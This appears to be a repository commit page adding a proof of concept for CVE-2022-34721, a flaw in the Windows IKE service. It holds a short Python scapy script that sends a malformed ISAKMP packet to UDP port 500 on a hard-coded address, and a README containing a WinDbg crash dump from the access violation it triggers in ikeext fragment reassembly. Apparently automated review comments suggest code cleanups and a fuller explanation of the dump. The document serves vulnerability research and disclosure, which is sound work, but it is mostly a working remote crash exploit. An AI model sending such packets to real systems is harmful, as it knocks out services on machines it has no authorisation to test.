Projects STRLCPY CVE-2022-34721 Commits c7227aaa
  • CVE-2022-34721.py
     1 +from scapy.all import *
     2 +from scapy.contrib.ikev2 import *
     3 +from scapy.layers.isakmp import *
     4 +import socket, time
     5 + 
     6 +target = ("192.168.159.134", 500)
     7 + 
     8 + 
     9 +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
     10 + 
     11 +pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)
     12 +pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")
     13 + 
     14 +sock.sendto(raw(pkt), target)
     15 + 
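Review bot: `time` (line 4) is imported but never used, `scapy.contrib.ikev2` (line 2) appears unused since the packet is built only from `scapy.layers.isakmp` classes, and `sock` (line 9) is never closed; drop the unused imports and wrap the socket in a `with socket.socket(...) as sock:` block or call `sock.close()` after `sendto`. The file also has no docstring or header comment naming the CVE, the component it exercises (`ikeext`, per the README crash dump) or the Windows build it was tested against, so a reader cannot match the script to the crash; add that at the top.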
  • README.md
     1 +```
     2 +(128.414): Access violation - code c0000005 (first chance)
     3 +First chance exceptions are reported before any exception handling.
     4 +This exception may be expected and handled.
     5 +ikeext!IkeQueueRecvRequest+0x158:
     6 +00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax] ds:0000017a`08459000=????????????????????????????????
     7 + 
     8 +0:005> r
     9 +rax=0000017a08459000 rbx=0000000000000000 rcx=00000008905fef70
     10 +rdx=ffffffffffffc000 rsi=00000008905feff0 rdi=0000017a08456f10
     11 +rip=00007ffb9e48d138 rsp=00000008905fef30 rbp=00000008905fefa0
     12 + r8=0000000000000000 r9=0000000000000000 r10=0000017a08459000
     13 +r11=0000017a08459000 r12=0000000000000000 r13=0000017a0843cb80
     14 +r14=0000017a08456f20 r15=0000000000000001
     15 +iopl=0 nv up ei pl zr na po nc
     16 +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
     17 +ikeext!IkeQueueRecvRequest+0x158:
     18 +00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax] ds:0000017a`08459000=????????????????????????????????
     19 + 
     20 +0:005> !heap -p -a @rax
     21 + address 0000017a08459000 found in
     22 + _DPH_HEAP_ROOT @ 17a08281000
     23 + in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
     24 + 17a08285a28: 17a08459000 0 - 17a08458000 2000
     25 +ReadMemory error for address 0000017a08459000
     26 + 00007ffbc8177e7f ntdll!RtlDebugAllocateHeap+0x000000000000003f
     27 + 00007ffbc811e1fa ntdll!RtlpAllocateHeap+0x000000000009c70a
     28 + 00007ffbc807fcad ntdll!RtlpAllocateHeapInternal+0x000000000000098d
     29 + 00007ffb9e486910 ikeext!WfpMemAlloc+0x0000000000000020
     30 + 00007ffb9e48d0ce ikeext!IkeQueueRecvRequest+0x00000000000000ee
     31 + 00007ffb9e4f1c0d ikeext!IkeReinjectReassembledPacket+0x0000000000000181
     32 + 00007ffb9e4f17ed ikeext!IkeInsertFragEntry+0x0000000000000259
     33 + 00007ffb9e4f1865 ikeext!IkePostPayloadProcessFrag+0x0000000000000031
     34 + 00007ffb9e4f1564 ikeext!IkeHandlePayloadFrag+0x00000000000000ac
     35 + 00007ffb9e507652 ikeext!IkeHandleMMPacketDispatchAuthip+0x000000000000005e
     36 + 00007ffb9e4ead86 ikeext!IkeProcessPacket+0x00000000000002f2
     37 + 00007ffb9e47fc84 ikeext!IkeProcessPacketDispatch+0x0000000000000fd4
     38 + 00007ffb9e47bb9c ikeext!IkeHandleRecvRequest+0x000000000000000c
     39 + 00007ffbc809e7e9 ntdll!TppSimplepExecuteCallback+0x0000000000000099
     40 + 00007ffbc8086964 ntdll!TppWorkerThread+0x0000000000000644
     41 + 00007ffbc7cc7974 KERNEL32!BaseThreadInitThunk+0x0000000000000014
     42 + 00007ffbc80ca2f1 ntdll!RtlUserThreadStart+0x0000000000000021
     43 + 
     44 +
     45 +0:005> dq @rax
     46 +0000017a`08459000 ????????`???????? ????????`????????
     47 +0000017a`08459010 ????????`???????? ????????`????????
     48 +0000017a`08459020 ????????`???????? ????????`????????
     49 +0000017a`08459030 ????????`???????? ????????`????????
     50 +0000017a`08459040 ????????`???????? ????????`????????
     51 +0000017a`08459050 ????????`???????? ????????`????????
     52 +0000017a`08459060 ????????`???????? ????????`????????
     53 +0000017a`08459070 ????????`???????? ????????`????????
     54 + 
     55 +0:005> k
     56 + # Child-SP RetAddr Call Site
     57 +00 00000008`905fef30 00007ffb`9e4f1c0d ikeext!IkeQueueRecvRequest+0x158
     58 +01 00000008`905fefd0 00007ffb`9e4f17ed ikeext!IkeReinjectReassembledPacket+0x181
     59 +02 00000008`905ff110 00007ffb`9e4f1865 ikeext!IkeInsertFragEntry+0x259
     60 +03 00000008`905ff180 00007ffb`9e4f1564 ikeext!IkePostPayloadProcessFrag+0x31
     61 +04 00000008`905ff1c0 00007ffb`9e507652 ikeext!IkeHandlePayloadFrag+0xac
     62 +05 00000008`905ff200 00007ffb`9e4ead86 ikeext!IkeHandleMMPacketDispatchAuthip+0x5e
     63 +06 00000008`905ff230 00007ffb`9e47fc84 ikeext!IkeProcessPacket+0x2f2
     64 +07 00000008`905ff2f0 00007ffb`9e47bb9c ikeext!IkeProcessPacketDispatch+0xfd4
     65 +08 00000008`905ff850 00007ffb`c809e7e9 ikeext!IkeHandleRecvRequest+0xc
     66 +09 00000008`905ff880 00007ffb`c8086964 ntdll!TppSimplepExecuteCallback+0x99
     67 +0a 00000008`905ff8d0 00007ffb`c7cc7974 ntdll!TppWorkerThread+0x644
     68 +0b 00000008`905ffbc0 00007ffb`c80ca2f1 KERNEL32!BaseThreadInitThunk+0x14
     69 +0c 00000008`905ffbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
     70 +```
     71 + 
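Review bot: The README is a bare WinDbg log with no explanatory text, so the crash has to be reverse-engineered from the dump; add a short summary above the fence stating what the visible output shows: a first-chance access violation in `ikeext!IkeQueueRecvRequest+0x158` on a 16-byte `movups` read from `rax`, where `!heap -p -a @rax` reports that address as a page-heap (`_DPH_HEAP_ROOT`) busy allocation of UserSize 0, returned by `ikeext!WfpMemAlloc` from `IkeQueueRecvRequest+0xee`, and that the allocation was reached through the fragment reassembly path (`IkeInsertFragEntry` -> `IkeReinjectReassembledPacket`). The summary should also record the OS build and `ikeext.dll` version the dump came from, whether the patched build is unaffected, and, if `rdx=ffffffffffffc000` is the length involved, say so, since that is the value a reader will want explained. The fence on line 1 has no language tag; use ```` ```text ```` so the log is not syntax-highlighted as code.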